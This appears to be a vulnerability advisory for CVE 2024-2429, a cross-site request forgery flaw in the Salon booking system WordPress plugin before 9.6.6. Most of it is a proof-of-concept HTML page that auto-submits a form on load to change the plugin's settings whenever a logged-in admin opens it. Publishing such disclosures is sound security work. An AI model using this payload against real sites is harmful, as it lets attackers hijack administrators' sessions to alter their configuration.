Salon booking system < 9.6.6 – Settings Update via CSRF | CVE 2024-2429

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

Make an admin open a page containing the code:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=salon-settings" method="POST"> 
        <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=salon-settings">
      
        <!-- These are the text inputs -->
        <input type="text" name="salon_settings[gen_name]" value="csrf">
        <input type="email" name="salon_settings[gen_email]" value="csrf@csrf.com">
        <input type="text" name="salon_settings[gen_phone]" value="csrf">
        <input type="text" name="salon_settings[gen_address]" value="">
      
        <!-- File input for gen_logo -->
        <input type="file" name="salon_settings[gen_logo]" filename="">
        
        <!-- More inputs -->
        <input type="text" name="salon_settings[date_format]" value="default">
        <input type="text" name="salon_settings[time_format]" value="default">
        <!-- ... Include other input elements here ... -->
      
        <input type="text" name="salon_settings[feedback_email_subject]" value="WPScan Vulnerability Testbench">
        <input type="text" name="salon_settings[zapier_site_url]" value="">
        <input type="text" name="salon_settings[zapier_api_key]" value="">
      
        <input type="submit" value="Submit">
        <input type="submit" name="reset" value="Reset Settings">
    </form>
</body>
```